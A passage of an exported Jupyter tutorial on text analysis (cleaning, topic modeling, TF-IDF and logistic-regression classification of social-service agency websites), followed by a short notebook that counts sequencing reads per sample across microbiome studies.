lot of 0s. With sparse matrices, it is often more efficient to keep track of which values *aren't* 0 and where those non-zero entries are located, rather than to save the entire matrix. To save space, the `scipy` library has special ways of storing sparse matrices in an efficient way. Our toy corpus is now ready to be analyzed. We used this toy example to illustrate how a document is turned into a matrix to be used in text analysis. When you're applying this to real text data, the matrix will be much larger and harder to interpret, but it's important that you know the process. --- Exercise 1 To check your knowledge, make your own toy corpus and turn it into a matrix. ###Code #solution exercise_corpus = ['Batman is friends with Superman', 'Superman is enemies with Lex Luthor', 'Batman is enemies with Lex Luthor'] exercise_bag_of_words, exercise_features = create_bag_of_words(exercise_corpus) np_bag_of_words = exercise_bag_of_words.toarray() exercise_features np_bag_of_words ###Output _____no_output_____ ###Markdown --- Word CountsAs an initial look into the data, we can examine the most frequently occuring words in our corpus. We can sum the columns of the bag_of_words and then convert to a numpy array. From here we can zip the features and word_count into a dictionary, and display the results. ###Code def get_word_counts(bag_of_words, feature_names): """ Get the ordered word counts from a bag_of_words Parameters ---------- bag_of_words: obj scipy sparse matrix from CounterVectorizer feature_names: ls list of words Returns ------- word_counts: dict Dictionary of word counts """ np_bag_of_words = bag_of_words.toarray() word_count = np.sum(np_bag_of_words,axis=0) np_word_count = np.asarray(word_count).ravel() dict_word_counts = dict( zip(feature_names, np_word_count) ) orddict_word_counts = OrderedDict( sorted(dict_word_counts.items(), key=lambda x: x[1], reverse=True), ) return orddict_word_counts get_word_counts(toy_bag_of_words, toy_features) ###Output _____no_output_____ ###Markdown Note that the words "document" and "documents" both appear separately in the list. Should they be treated as the same words, since one is just the plural of the other, or should they be considered distinct words? These are the types of decisions you will have to make in your preprocessing steps. --- Exercise 2 Get the word counts of your exercise corpus. ###Code get_word_counts(exercise_bag_of_words, exercise_features) ###Output _____no_output_____ ###Markdown Text CorporaFirst we need to form our corpus, or the set of all descriptions from all websites. We can pull out the array of descriptions from the data frame using the data frame's `.values` attribute. ###Code corpus = df_socialservices_data['textfromurl'].values #pull all the descriptions and put them in a numpy array corpus def create_topics(tfidf, features, N_TOPICS=3, N_TOP_WORDS=5,): """ Given a matrix of features of text data generate topics Parameters ----------- tfidf: scipy sparse matrix sparse matrix of text features N_TOPICS: int number of topics (default 10) N_TOP_WORDS: int number of top words to display in each topic (default 10) Returns ------- ls_keywords: ls list of keywords for each topics doctopic: array numpy array with percentages of topic that fit each category N_TOPICS: int number of assumed topics N_TOP_WORDS: int Number of top words in a given topic. """ with progressbar.ProgressBar(max_value=progressbar.UnknownLength) as bar: i=0 lda = LatentDirichletAllocation( n_topics= N_TOPICS, learning_method='online') #create an object that will create 5 topics bar.update(i) i+=1 doctopic = lda.fit_transform( tfidf ) bar.update(i) i+=1 ls_keywords = [] for i,topic in enumerate(lda.components_): word_idx = np.argsort(topic)[::-1][:N_TOP_WORDS] keywords = ', '.join( features[i] for i in word_idx) ls_keywords.append(keywords) print(i, keywords) bar.update(i) i+=1 return ls_keywords, doctopic corpus_bag_of_words, corpus_features = create_bag_of_words(corpus) ###Output _____no_output_____ ###Markdown Let's examine our features. ###Code corpus_features ###Output _____no_output_____ ###Markdown The first aspect to notice about the feature list is that the first few entries are numbers that have no real semantic meaning. The feature lists also includes numerous other useless words, such as prepositions and articles, that will just add noise to our analysis. We can also notice the words *action* and *activities*, or the words *addition* and *additional*, are close enough to each other that it might not make sense to treat them as entirely separate words. Part of your cleaning and preprocessing duties will be manually inspecting your lists of features, seeing where these issues arise, and making decisions to either remove them from your analysis or address them separately. Let's get the count of the number of times that each of the words appears in our corpus. ###Code get_word_counts(corpus_bag_of_words, corpus_features) ###Output _____no_output_____ ###Markdown Our top words are articles, prepositions and conjunctions that are not informative whatsoever, so we're probably not going to come up with anything interesting ("garbage in, garbage out"). Nevertheless, let's forge blindly ahead and try to create topics, and see the quality of the results that we get. ###Code ls_corpus_keywords, corpus_doctopic = create_topics(corpus_bag_of_words, corpus_features) ###Output _____no_output_____ ###Markdown These topics don't give us any real insight to what the data contains - one of the topics is "and, the, to, of, in"! There are some hints to the subjects of the websites ("YWCA", "youth") and their locations ("Evanston"), but the signal is being swamped by the noise. The word "click" also comes up. This word might be useful in some contexts, but since we scraped this data from websites, it's likely that "click" is more related to the website itself (e.g. "Click here to find out more") as opposed to the content of the website. We'll have to clean and process our data to get any meaningful information out of this text. Text Cleaning and NormalizationTo clean and normalize text, we'll remove all special characters, numbers, and punctuation, so we're left with only the words themselves. Then we will make all the text lowercase; this uniformity will ensure that the algorithm doesn't treat "the" and "The" as different words, for example. To remove the special characters, numbers and punctuation we will use regular expressions. **Regular Expressions**, or "regexes" for short, let you find all the words or phrases in a document or text file that match a certain pattern. These rules are useful for pulling out useful information from a large amount of text. For example, if you want to find all email addresses in a document, you might look for everything that looks like *some combination of letters, _, .* followed by *@*, followed by more letters, and ending in *.com* or *.edu*. If you want to find all the credit card numbers in a document, you might look for everywhere you see the pattern "four numbers, space, four numbers, space, four numbers, space, four numbers." Regexes are also helpful if you are scraping information from websites, because you can use them to separate the content from the HTML code used for formatting the website.A full tutorial on regular expressions would be outside the scope of this tutorial, but many good tutorials that can be found on-line. [regex101.com](regex101.com) is also a great interactive tool for developing and checking regular expressions.>"Some people, when confronted with a problem, think >'I know, I'll use regular expressions.' Now they have two problems."> -- Jaime Zawinski*A word of warning:* Regexes can work much more quickly than plain text sorting; however, if your regular expressions are becoming overly complicated, it's a good idea to find a simpler way to do what you want to do. Any developer should keep in mind there is a trade-off between optimization and understandability. The general philosophy of programming in Python is that your code is meant to be as understandable by *people* as much as possible, because human time is more valuable than computer time. You should therefore lean toward understandability rather than overly optimizing your code to make it run as quickly as possible. Your future-self, code-reviewers, people who inherit your code, and anyone else who has to make sense of your code in the future will appreciate it. For our purposes, we are going to use a regular expression to match all characters that are not letters -- punctuation, quotes, special characters and numbers -- and replace them with spaces. Then we'll make all of the remaining characters lowercase. We will be using the `re` library in python for regular expression matching. ###Code #get rid of the punctuations and set all characters to lowercase RE_PREPROCESS = r'\W+|\d+' #the regular expressions that matches all non-characters #get rid of punctuation and make everything lowercase #the code below works by looping through the array of text ("corpus") #for a given piece of text ("comment") we invoke the `re.sub` command #the `re.sub` command takes 3 arguments: (1) the regular expression to match, #(2) what we want to substitute in place of that matching string (' ', a space) #and (3) the text we want to apply this to. #we then invoke the `lower()` method on the output of the `re.sub` command #to make all the remaining characters lowercase. #the result is a list, where each entry in the list is a cleaned version of the #corresponding entry in the original corpus. #we then make the list into a numpy array to use it in analysis processed_corpus = np.array( [ re.sub(RE_PREPROCESS, ' ', comment).lower() for comment in corpus] ) ###Output _____no_output_____ ###Markdown First Description, Before Cleaning ###Code corpus[0] ###Output _____no_output_____ ###Markdown This text includes a lot of useful information, but also includes some things we don't want or need. There are some weird special characters (like `\xe2\x80\x94`). There are also some numbers, which are informative and interesting to a human reading the text (phone numbers, addresses, "since 1899," "impacts the lives of nearly 20,000 children"), but when we break down the documents into individual words, the numbers will become meaningless. We'll also want to remove all punctuation, so that we can say any two things separated by a space are individual words. First Description, After Cleaning ###Code processed_corpus[0] ###Output _____no_output_____ ###Markdown All lowercase, all numbers and special characters have been removed. Out text is now normalized. TokenizationNow that we've cleaned our text, we can *tokenize* it by deciding which words or phrases are the most meaningful. In this case, we'll want to split our text into individual words. Normally the `CountVectorizer` handles this for us.To go from a whole document to a list of individual words, we can use the `.split()` command. By default, this command splits based on spaces in between words, so we don't need to specify that explicitly. ###Code tokens = processed_corpus[0].split() tokens ###Output _____no_output_____ ###Markdown StopwordsStopwords are words that are found commonly throughout a text and carry little semantic meaning. Examples of common stopwords are prepositions, articles and common nouns. For example, the words *the* and *of* are totally ubiquitous, so they won't serve as meaningful features, whether to distinguish documents from each other or to tell what a given document is about. You may also run into words that you want to remove based on where you obtained your corpus of text or what it's about. There are many lists of common stopwords available for you to use, both for general documents and for specific contexts, so you don't have to start from scratch. We can eliminate stopwords by checking all the words in our corpus against a list of commonly occuring stopwords. ###Code eng_stopwords = stopwords.words('english') eng_stopwords #sample of stopwords #this is an example of slicing where we implicitly start at the beginning and move to the end #we select every 10th entry in the array eng_stopwords[::10] ###Output _____no_output_____ ###Markdown Notice that this list includes "weren" and "hasn" as well as single letters ("t"). Why do you think these are contained in the list of stopwords? --- Exercise 3Try slicing after 5th word. ###Code eng_stopwords[::5] ###Output _____no_output_____ ###Markdown --- Topic Modeling on Cleaned DataNow that we've cleaned up our data a little bit, let's see what our bag of words looks like. ###Code processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus, stop_words=eng_stopwords) dict_processed_word_counts = get_word_counts(processed_bag_of_words, processed_features) dict_processed_word_counts ###Output _____no_output_____ ###Markdown Much better! Now this is starting to look like a reasonable representation of our corpus of text. We mentioned that, in addition to stopwords that are common across all types of text analysis problems, there wil also be specific stopwords based on the context of your domain. Notice how the top words include words like "services," "youth," "community," "mission"? It makes sense that these words are so common, but we'd expect to see them in every website in our corpus - after all, we're looking at websites of social service organizations in Chicago! - so they won't be very helpful in analysis. One quick way to remove some of these domain-specific stopwords is by dropping some of your most frequent words. We'll start out by dropping the top 20. You'll want to change this number, playing with making it bigger and smaller, to see how it affects your resulting topics. ###Code top_20_words = list(dict_processed_word_counts.keys())[:20] domain_specific_stopwords = eng_stopwords + top_20_words processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus, stop_words=domain_specific_stopwords) dict_processed_word_counts = get_word_counts(processed_bag_of_words, processed_features) dict_processed_word_counts ###Output _____no_output_____ ###Markdown This is a bit better - although we still see some words that are probably very common ("care", "communities"), words like "catholic," "north," and "violence" will probably help us come up with more specific categories within the broader realm of social services. Let's see what topics we produce. ###Code processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features) ###Output _____no_output_____ ###Markdown Now we are starting to get somewhere! We can manipulate the number of topics we want to find and the number of words to use for each topic to see if we can understand more from our corpus. ###Code processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 5, N_TOP_WORDS= 10) ###Output _____no_output_____ ###Markdown Some structure is starting to reveal itself - "legal" and "law" appear in the same topic, as do "violence," "domestic," and "women" (probably appearing in websites of women's shelters). Adding more topics has revealed to larger subtopics. Let's see if increasing the number of topics gives us more information.However, we can see that "donatebutton" and "companylogo" are still present - these are more likely artifacts of the websites than useful information about the charities! This is an iterative process - after seeing the results of some analysis, you will need to go back to the preprocessing step and add more words to your list of stopwords or change how you cleaned the data. ###Code processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 10, N_TOP_WORDS= 15) ###Output _____no_output_____ ###Markdown This looks like a good amount of topics for now. Some of the top words are quite similar, like "volunteer" and "volunteers," or "child" and "children." Let's move to stemming and lemmatization. Stemming and LemmatizationWe can further process our text through *stemming and lemmatization*, or replacing words with their root or simplest form. For example "systems," "systematic," and "system" are all different words, but we can replace all these words with "system" without sacrificing much meaning. A **lemma** is the original dictionary form of a word (e.g. the lemma for "lies," "lied," and "lying" is "lie"). The process of turning a word into its simplest form is **stemming**. There are several well known stemming algorithms -- Porter, Snowball, Lancaster -- that all have their respective strengths and weaknesses. For this tutorial, we'll use the Porter Stemmer. ###Code stemmer = SnowballStemmer("english") print(stemmer.stem('lies')) print(stemmer.stem("lying")) print(stemmer.stem('systematic')) print(stemmer.stem("running")) processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus, stop_words=domain_specific_stopwords, stem=False) processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 10, N_TOP_WORDS= 15) ###Output _____no_output_____ ###Markdown N-gramsObviously, reducing a document to a bag of words means losing much of its meaning - we put words in certain orders, and group words together in phrases and sentences, precisely to give them more meaning. If you follow the processing steps we've gone through so far, splitting your document into individual words and then removing stopwords, you'll completely lose all phrases like "kick the bucket," "commander in chief," or "sleeps with the fishes." One way to address this is to break down each document similarly, but rather than treating each word as an individual unit, treat each group of 2 words, or 3 words, or *n* words, as a unit. We call this a "bag of *n*-grams," where *n* is the number of words in each chunk. Then you can analyze which groups of words commonly occur together (in a fixed order). Let's transform our corpus into a bag of n-grams with *n*=2: a bag of 2-grams, AKA a bag of bi-grams. ###Code processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus, stop_words=domain_specific_stopwords, stem=True, NGRAM_RANGE=(0,2)) processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 10, N_TOP_WORDS= 15) ###Output _____no_output_____ ###Markdown We can see that this lets us uncover patterns that we couldn't when we just used a bag of words: "north shore" and "domest violenc" come up as words. Note that this still includes the individual words, as well as the bi-grams. TF-IDF (Term Frequency-Inverse Document Frequency)A final step in cleaning and processing our text data is **Term Frequency-Inverse Document Frequency (TF-IDF)**. TF-IDF is based on the idea that the words (or terms) that are most related to a certain topic will occur frequently in documents on that topic, and infrequently in other. To reweight words so that the we capture words that are unique to a document and suppress words that are common throughout the corpus by inversely weighting them by their frequency that are common throughout the corpus ###Code processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus, stop_words=domain_specific_stopwords, stem=True, NGRAM_RANGE=(0,2), USE_IDF = True) dict_word_counts = get_word_counts(processed_bag_of_words, processed_features) dict_word_counts ###Output _____no_output_____ ###Markdown The words counts have been reweighted to emphasize the more meaningful words of the corpus, while de-emphasizing the words that are found commonly throughout the corpus. ###Code processed_keywords, processed_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 10, N_TOP_WORDS= 15) ###Output _____no_output_____ ###Markdown --- Exercise 4You can only develop an intuition for the right number of topics and topic words suitable for a given problem by iterating until you find a good match. Change the number of topics and topic words until you get an intution of how many words and topics are enough. ###Code exercise_keywords, exercise_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 5, N_TOP_WORDS= 25) exercise_keywords, exercise_doctopic = create_topics(processed_bag_of_words, processed_features, N_TOPICS = 10, N_TOP_WORDS= 25) ###Output _____no_output_____ ###Markdown --- ###Code #grab the topic_id of the majority topic for each document and store it in a list ls_topic_id = [np.argsort(processed_doctopic[comment_id])[::-1][0] for comment_id in range(len(corpus))] df_socialservices_data['topic_id'] = ls_topic_id #add to the dataframe so we can compare with the job titles ###Output _____no_output_____ ###Markdown Now that each row is tagged with a topic ID. Let's see how well the topics explain the social services by looking at the first topic, and seeing how similar the social services within that topic are to each other. ###Code topic_num = 0 print(processed_keywords[topic_num]) df_socialservices_data[ df_socialservices_data.topic_id == topic_num ].head(10) ###Output _____no_output_____ ###Markdown --- Exercise 5Examine the other topic IDs, and see if the "topics" we identified make sense as groupings of social service agencies. ###Code topic_num = 3 print(processed_keywords[topic_num]) df_socialservices_data[ df_socialservices_data.topic_id == topic_num ].head(10) ###Output _____no_output_____ ###Markdown --- Supervised Learning: Document ClassificationPreviously, we used topic modeling to infer relationships between social service facilities within the data. That is an example of unsupervised learning: we were looking to uncover structure in the form of topics, or groups of agencies, but we did not necessarily know the ground truth of how many groups we should find or which agencies belonged in which group. Now we turn our attention to supervised learning. In supervised learning, we have a *known* outcome or label (*Y*) that we want to produce given some data (*X*), and in general, we want to be able to produce this *Y* when we *don't* know it, or when we *only* have *X*. In order to produce labels we need to first have examples our algorithm can learn from, a "training set." In the context of text analysis, developing a training set can be very expensive, as it can require a large amount of human labor or linguistic expertise. **Document classification** is an example of supervised learning in which want to characterize our documents based on their contents (*X*). A common example of document classification is spam e-mail detection. Another example of supervised learning in text analysis is *sentiment analysis*, where *X* is our documents and *Y* is the state of the author. This "state" is dependent on the question you're trying to answer, and can range from the author being happy or unhappy with a product to the author being politically conservative or liberal. Another example is *part-of-speech tagging* where *X* are individual words and *Y* is the part-of-speech. In this section, we'll train a classifier to classify social service agencies. Let's see if we can label a new website as belonging to facility type "income" or "health." Load the Data ###Code df_socialservices_data.factype.value_counts() mask = df_socialservices_data.factype.isin(['income','health']) df_income_health = df_socialservices_data[mask] df_train, df_test = train_test_split(df_income_health, test_size=0.20, random_state=17) df_train.head() df_train['factype'].unique() Counter(df_train['factype'].values) df_test.head() df_test['factype'].unique() Counter(df_test['factype'].values) ###Output _____no_output_____ ###Markdown Process DataIn order to feed out data into a classifier, we need to pull out the labels (*Y*) and a clean corpus of documents (*X*) for our training and testing sets. ###Code train_labels = df_train.factype.values train_corpus = np.array( [re.sub(RE_PREPROCESS, ' ', text).lower() for text in df_train.textfromurl.values]) test_labels = df_test.factype.values test_corpus = np.array( [re.sub(RE_PREPROCESS, ' ', text).lower() for text in df_test.textfromurl.values]) labels = np.append(train_labels, test_labels) ###Output _____no_output_____ ###Markdown Just as we had done in the unsupervised learning context, we have to transform our data. This time we have to transform our testing and training set into two different bags of words. The classifier will learn from the training set, and we will evaluate the classifier's performance on the testing set. ###Code #parameters for vectorizer ANALYZER = "word" #unit of features are single words rather then phrases of words STRIP_ACCENTS = 'unicode' TOKENIZER = None NGRAM_RANGE = (0,2) #Range for pharases of words MIN_DF = 0.01 # Exclude words that have a frequency less than the threshold MAX_DF = 0.8 # Exclude words that have a frequency greater then the threshold vectorizer = CountVectorizer(analyzer=ANALYZER, tokenizer=None, # alternatively tokenize_and_stem but it will be slower ngram_range=NGRAM_RANGE, stop_words = stopwords.words('english'), strip_accents=STRIP_ACCENTS, min_df = MIN_DF, max_df = MAX_DF) NORM = None #turn on normalization flag SMOOTH_IDF = True #prvents division by zero errors SUBLINEAR_IDF = True #replace TF with 1 + log(TF) USE_IDF = True #flag to control whether to use TFIDF transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True) #get the bag-of-words from the vectorizer and #then use TFIDF to limit the tokens found throughout the text start_time = time.time() train_bag_of_words = vectorizer.fit_transform( train_corpus ) #using all the data on for generating features!! Bad! test_bag_of_words = vectorizer.transform( test_corpus ) if USE_IDF: train_tfidf = transformer.fit_transform(train_bag_of_words) test_tfidf = transformer.transform(test_bag_of_words) features = vectorizer.get_feature_names() print('Time Elapsed: {0:.2f}s'.format( time.time()-start_time)) ###Output _____no_output_____ ###Markdown We cannot pass the labels "income" or "health" directly to the classifier. Instead, we to encode them as 0s and 1s using the `labelencoder` part of `sklearn`. ###Code #relabel our labels as a 0 or 1 le = preprocessing.LabelEncoder() le.fit(labels) labels_binary = le.transform(labels) list(zip(labels,labels_binary)) ###Output _____no_output_____ ###Markdown We also need to create arrays of indices so we can access the training and testing sets accordingly. ###Code train_size = df_train.shape[0] train_set_idx = np.arange(0,train_size) test_set_idx = np.arange(train_size, len(labels)) train_labels_binary = labels_binary[train_set_idx] test_labels_binary = labels_binary[test_set_idx] ###Output _____no_output_____ ###Markdown The classifier we are using in the example is LogisticRegression. As we saw in the Machine Learning tutorial, first we decide on a classifier, then we fit the classifier to the data to create a model. We can then test our model on the test set by passing the features (*X*) from our test set to get predicted labels. The model will output the probability of each document being classified as income or health. ###Code clf = LogisticRegression(penalty='l1') mdl = clf.fit(train_tfidf, labels_binary[train_set_idx]) #train the classifer to get the model y_score = mdl.predict_proba( test_tfidf ) #score of the document referring to an income or health agency ###Output _____no_output_____ ###Markdown Evaluation ###Code def plot_precision_recall_n(y_true, y_prob, model_name): """ y_true: ls ls of ground truth labels y_prob: ls ls of predic proba from model model_name: str str of model name (e.g, LR_123) """ from sklearn.metrics import precision_recall_curve y_score = y_prob precision_curve, recall_curve, pr_thresholds = precision_recall_curve(y_true, y_score) precision_curve = precision_curve[:-1] recall_curve = recall_curve[:-1] pct_above_per_thresh = [] number_scored = len(y_score) for value in pr_thresholds: num_above_thresh = len(y_score[y_score>=value]) pct_above_thresh = num_above_thresh / float(number_scored) pct_above_per_thresh.append(pct_above_thresh) pct_above_per_thresh = np.array(pct_above_per_thresh) plt.clf() fig, ax1 = plt.subplots() ax1.plot(pct_above_per_thresh, precision_curve, 'b') ax1.set_xlabel('percent of population') ax1.set_ylabel('precision', color='b') ax1.set_ylim(0,1.05) ax2 = ax1.twinx() ax2.plot(pct_above_per_thresh, recall_curve, 'r') ax2.set_ylabel('recall', color='r') ax2.set_ylim(0,1.05) name = model_name plt.title(name) plt.show() plot_precision_recall_n(labels_binary[test_set_idx], y_score[:,1], 'LR') ###Output _____no_output_____ ###Markdown If we examine our precision-recall curve we can see that our precision is 1 up to 40 percent of the population. We can use a "precision at *k*" curve to see what percent of the corpus can be tagged by the classifier, and which should undergo a manual clerical review. Based on this curve, we might say that we can use our classifier to tag the 25% of the documents that have the highest scores as 1, and manually review the rest. Alternatively, we can try to maximize the entire precision-recall space. In this case we need a different metric. ###Code def plot_precision_recall(y_true,y_score): """ Plot a precision recall curve Parameters ---------- y_true: ls ground truth labels y_score: ls score output from model """ precision_curve, recall_curve, pr_thresholds = precision_recall_curve(y_true,y_score[:,1]) plt.plot(recall_curve, precision_curve) plt.xlabel('Recall') plt.ylabel('Precision') auc_val = auc(recall_curve,precision_curve) print('AUC-PR: {0:1f}'.format(auc_val)) plt.show() plt.clf() plot_precision_recall(labels_binary[test_set_idx],y_score) ###Output _____no_output_____ ###Markdown The AUC shows how accurate our scores are under different cutoff thresholds. The model will output a score between 0 and 1. We specify a range of cutoff values and label all of the examples as 0 or 1 based on whether they are above or below each cutoff value. The closer our scores are to the true values, the more resilient they are to different cutoffs. For instance, if our scores were perfect, our AUC would be 1. Feature Importances ###Code def display_feature_importances(coef,features, labels, num_features=10): """ output feature importances Parameters ---------- coef: numpy feature importances features: ls feature names labels: ls labels for the classifier num_features: int number of features to output (default 10) Example -------- """ coef = mdl.coef_.ravel() dict_feature_importances = dict( zip(features, coef) ) orddict_feature_importances = OrderedDict( sorted(dict_feature_importances.items(), key=lambda x: x[1]) ) ls_sorted_features = list(orddict_feature_importances.keys()) label0_features = ls_sorted_features[:num_features] label1_features = ls_sorted_features[-num_features:] print(labels[0],label0_features) print(labels[1], label1_features) display_feature_importances(mdl.coef_.ravel(), features, ['health','income']) ###Output _____no_output_____ ###Markdown The feature importances give us the words which are the most relevant for distinguishing the type of social service agency (between income and health). Some of these make sense ("city church" seems more likely to be health than income), but some don't make as much sense, or seem to be artifacts from the website that we should remove ("housing humancarelogo"). --- Exercise 6 Display the top 25 feature importances to get an intution of which words are the most and least important. We need to know how to pass into the function we want the top 25 feature importances. We can do this by consulting the docstring of the function. From this docstring we can see that `num_features` is a keyword argument that is set to 10 by default. We can pass `num_features=25` into the keyword argument instead to get the top 25 feature importances. ###Code display_feature_importances(mdl.coef_.ravel(), features, ['health','income'], num_features=25) ###Output _____no_output_____ ###Markdown --- Cross-validationRecall from the machine learning tutorial that we are seeking the find the most general pattern in the data in order to have to most general model that will be successful at classifying new unseen data. Our previous strategy above was the *Out-of-sample and holdout set*. With this strategy we try to find a general pattern by randomly dividing our data into a test and training set based on some percentage split (e.g., 50-50 or 80-20). We train on the test set and evaluate on the test set, where we pretend that we don't have the labels for the test set. A significant drawback with this approach is that we may be lucky or unlucky with our random split, and so our estimate of how we'd perform on truly new data is overly optimistic or overly pessimistic. A possible solution is to create many random splits into training and testing sets and evaluate each split to estimate the performance of a given model. A more sophisticated holdout training and testing procedure is *cross-validation*. In cross-validation we split our data into *k* folds or partitions, where *k* is usually 5 or 10. We then iterate k times. In each iteration, one of the folds is used as a test set, and the rest of the folds are combined to form the training set. We can then evaluate the performance at each iteration to estimate the performance of a given method. An advantage of using cross-validation is all examples of data are used in the training set at least once. ###Code def create_test_train_bag_of_words(train_corpus, test_corpus): """ Create test and training set bag of words Parameters ---------- train_corpus: ls ls of raw text for text corpus. test_corpus: ls ls of raw text for train corpus. Returns ------- (train_bag_of_words,test_bag_of_words): scipy sparse matrix bag-of-words representation of train and test corpus features: ls ls of words used as features. """ #parameters for vectorizer ANALYZER = "word" #unit of features are single words rather then phrases of words STRIP_ACCENTS = 'unicode' TOKENIZER = None NGRAM_RANGE = (0,2) #Range for pharases of words MIN_DF = 0.01 # Exclude words that have a frequency less than the threshold MAX_DF = 0.8 # Exclude words that have a frequency greater then the threshold vectorizer = CountVectorizer(analyzer=ANALYZER, tokenizer=None, # alternatively tokenize_and_stem but it will be slower ngram_range=NGRAM_RANGE, stop_words = stopwords.words('english'), strip_accents=STRIP_ACCENTS, min_df = MIN_DF, max_df = MAX_DF) NORM = None #turn on normalization flag SMOOTH_IDF = True #prevents division by zero errors SUBLINEAR_IDF = True #replace TF with 1 + log(TF) USE_IDF = True #flag to control whether to use TFIDF transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True) #get the bag-of-words from the vectorizer and #then use TFIDF to limit the tokens found throughout the text train_bag_of_words = vectorizer.fit_transform( train_corpus ) test_bag_of_words = vectorizer.transform( test_corpus ) if USE_IDF: train_tfidf = transformer.fit_transform(train_bag_of_words) test_tfidf = transformer.transform(test_bag_of_words) features = vectorizer.get_feature_names() return train_tfidf, test_tfidf, features from sklearn.cross_validation import StratifiedKFold cv = StratifiedKFold(train_labels_binary, n_folds=3) train_labels_binary = le.transform(train_labels) for i, (train,test) in enumerate(cv): cv_train = train_corpus[train] cv_test = train_corpus[test] bag_of_words_train, bag_of_words_test, feature_names = create_test_train_bag_of_words(cv_train, cv_test) probas_ = clf.fit(bag_of_words_train, train_labels_binary[train]).predict_proba(bag_of_words_test) cv_test_labels = train_labels_binary[test] precision_curve, recall_curve, pr_thresholds = precision_recall_curve(cv_test_labels, probas_[:,1]) auc_val = auc(recall_curve,precision_curve) plt.plot(recall_curve, precision_curve, label='AUC-PR {0} {1:.2f}'.format(i,auc_val)) plt.ylim(0,1.05) plt.xlabel('Recall') plt.ylabel('Precision') plt.legend(loc="lower left", fontsize='x-small') ###Output _____no_output_____ ###Markdown In this case we did 5-fold cross-validation and plotted precision-recall curves for each iteration. You can see that there is a marked difference between the iterations. We can then average the AUC-PR of each iteration to estimate the performance of our method. --- Exercise 7 Try 5-fold cross-validation. ###Code from sklearn.cross_validation import StratifiedKFold cv = StratifiedKFold(train_labels_binary, n_folds=5) train_labels_binary = le.transform(train_labels) for i, (train,test) in enumerate(cv): cv_train = train_corpus[train] cv_test = train_corpus[test] bag_of_words_train, bag_of_words_test, feature_names = create_test_train_bag_of_words(cv_train, cv_test) probas_ = clf.fit(bag_of_words_train, train_labels_binary[train]).predict_proba(bag_of_words_test) cv_test_labels = train_labels_binary[test] precision_curve, recall_curve, pr_thresholds = precision_recall_curve(cv_test_labels, probas_[:,1]) auc_val = auc(recall_curve,precision_curve) plt.plot(recall_curve, precision_curve, label='AUC-PR {0} {1:.2f}'.format(i,auc_val)) plt.ylim(0,1.05) plt.xlabel('Recall') plt.ylabel('Precision') plt.legend(loc="lower left", fontsize='x-small') ###Output _____no_output_____ ###Markdown --- Examples of Tagging ###Code df_test num_comments = 2 label0_comment_idx = y_score[:,1].argsort()[:num_comments] label1_comment_idx = y_score[:,1].argsort()[-num_comments:] test_set_labels = labels[test_set_idx] #convert back to the indices of the original dataset top_comments_testing_set_idx = np.concatenate([label0_comment_idx, label1_comment_idx]) #these are the 5 comments the model is most sure of for i in top_comments_testing_set_idx: print( u"""{}:{}\n---\n{}\n===""".format(test_set_labels[i], y_score[i,1], test_corpus[i])) ###Output _____no_output_____
scripts/count_reads.ipynb
###Markdown Create a table with mean, std and median of number of reads per sample for each study ###Code def count_reads(out_file,rarefaction_depths): '''Count the reads for each sample in each cohort and save the mean, median and std Parameters ---------- out_file:str name of the output tsv file rarefaction_depths: list of int the rarefactions to test ''' cols = ['cohort','mean','median','std','num_samples','num_HC','num_disease'] for crare in rarefaction_depths: cols.append('num_rare_%d' % crare) df=pd.DataFrame(columns=cols) out_file = join(save_dir,out_file) num_processed = 0 for cname in glob.glob('../studies/*'): if os.path.isdir(cname): print('**********') print(cname) tables = glob.glob(os.path.join(cname,'all.*biom')) print(tables) if len(tables)==0: print('dir %s does not contain a biom table' % cname) continue bt=tables[0] data=ca.read_amplicon(os.path.join(bt),os.path.join(cname,'up.map.csv'),normalize=10000,min_reads=1000) data=data.filter_samples('type',['HC','disease']) print('-------------') print(data) cline={} cline['cohort']=cname cline['mean']=np.mean(data.sample_metadata._calour_original_abundance) cline['median']=np.median(data.sample_metadata._calour_original_abundance) cline['std']=np.std(data.sample_metadata._calour_original_abundance) cline['num_samples'] = len(data.sample_metadata) cline['num_HC'] = np.sum(data.sample_metadata['type']=='HC') cline['num_disease'] = np.sum(data.sample_metadata['type']=='disease') for crare in rarefaction_depths: cline['num_rare_%d' % crare] = np.sum(data.sample_metadata._calour_original_abundance >= crare) df = df.append(cline,ignore_index=True) num_processed += 1 print('processed %d studies' % num_processed) df.to_csv(out_file,sep='\t') ca.set_log_level('ERROR') count_reads(out_file='summary.txt', rarefaction_depths=[1000, 4000, 7500, 10000]) ###Output ********** ../studies/61 ['../studies/61/all.biom'] ------------- AmpliconExperiment with 41 samples, 2715 features ********** ../studies/59 ['../studies/59/all.biom'] ------------- AmpliconExperiment with 33 samples, 2637 features ********** ../studies/50 ['../studies/50/all.biom'] ------------- AmpliconExperiment with 58 samples, 959 features ********** ../studies/57 ['../studies/57/all.biom'] ------------- AmpliconExperiment with 85 samples, 4058 features ********** ../studies/32 ['../studies/32/all.biom'] ------------- AmpliconExperiment with 43 samples, 1748 features ********** ../studies/56 ['../studies/56/all.biom'] ------------- AmpliconExperiment with 43 samples, 3045 features ********** ../studies/51 ['../studies/51/all.biom'] ------------- AmpliconExperiment with 164 samples, 3240 features ********** ../studies/58 ['../studies/58/all.biom'] ------------- AmpliconExperiment with 45 samples, 3005 features ********** ../studies/60 ['../studies/60/all.biom'] ------------- AmpliconExperiment with 73 samples, 3771 features ********** ../studies/34 ['../studies/34/all.biom'] ------------- AmpliconExperiment with 32 samples, 1234 features ********** ../studies/33 ['../studies/33/all.biom'] ------------- AmpliconExperiment with 58 samples, 1250 features ********** ../studies/20 ['../studies/20/all.biom'] ------------- AmpliconExperiment with 151 samples, 1622 features ********** ../studies/18 